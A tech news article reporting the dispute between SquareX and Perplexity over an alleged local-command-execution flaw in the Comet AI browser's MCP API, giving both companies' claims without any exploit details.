- SquareX accused Perplexity’s Comet browser of exposing a hidden MCP API that could allow local command execution
- Perplexity dismissed these claims as “entirely false”, pointing out that the API requires developer mode, user consent and manual loading.
- SquareX hit back, saying Comet was silently updated after its proof of concept and that external researchers replicated the attack.
Cybersecurity firm SquareX recently accused Perplexity of retaining a major vulnerability in its AI browser, Comet – the latter has now responded, saying the research report was “entirely false” and part of a growing problem of “fake security research”.
SquareX had said it had found a hidden API in the Comet browser, capable of executing local commands. This API, named MCP API, allows its built-in extensions to execute arbitrary local commands on users’ devices, capabilities that traditional browsers explicitly prohibit.
SquareX said it found the API in the Agentic extension, which can be triggered by the perplexity.ai page, meaning that if someone breaks into the Perplexity site, they will have access to all of its users’ devices.
Perplexity’s response
Kabilan Sakthivel, a researcher at SquareX, said failing to adhere to the strict security controls the industry has evolved toward “reverses the course of decades of browser security principles established by vendors like Chrome, Safari and Firefox.”
But Perplexity disagrees, noting in a written response sent to TechRadar Pro by spokesperson Jesse Dwyer that the report is “entirely false.”
The company added that the vulnerability requires the work to be done by a human, not Comet Assistant, and that developer mode be enabled.
“To reproduce this, the human user must enable developer mode and manually load the malware into Comet,” it says.
Perplexity also said that Comet’s failure to explicitly obtain user consent for any local system access is “categorically false.”
“When installing local MCPs, we need user consent: users are the ones who configure it and call the MCP API. They specify exactly which command to run,” Dwyer wrote. “Any additional commands from the MCP (e.g. calling an AI tool) also require confirmation from the user.”
Additionally, Perplexity claims that what SquareX describes as a “hidden API” is actually “simply how Comet can run MCPs locally”, with user permission and consent obtained beforehand.
“This is the second time SquareX has presented false security research. The first one we also proved was false,” he noted.
Dwyer also claims that SquareX did not submit a report as it claims. “Instead, they sent a link to a Google Doc, with no context and no access. We informed them that we could not open the Google Docs, requested access to the Google Docs, and never heard back or received access to the documents.”
SquareX also fights back
But SquareX isn’t backing down either.
The company also said it spotted Perplexity doing a “silent update” of Comet, in which the same POC will now return “Local MCP is not enabled.”
It claims that three external researchers reproduced the attack and that Perplexity fixed it a few hours ago.
“This is great news from a security perspective and we are happy that our research can help make the AI Browser more secure,” SquareX concluded, adding that it has not received a response from Plerplexity regarding its VDP submission.
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
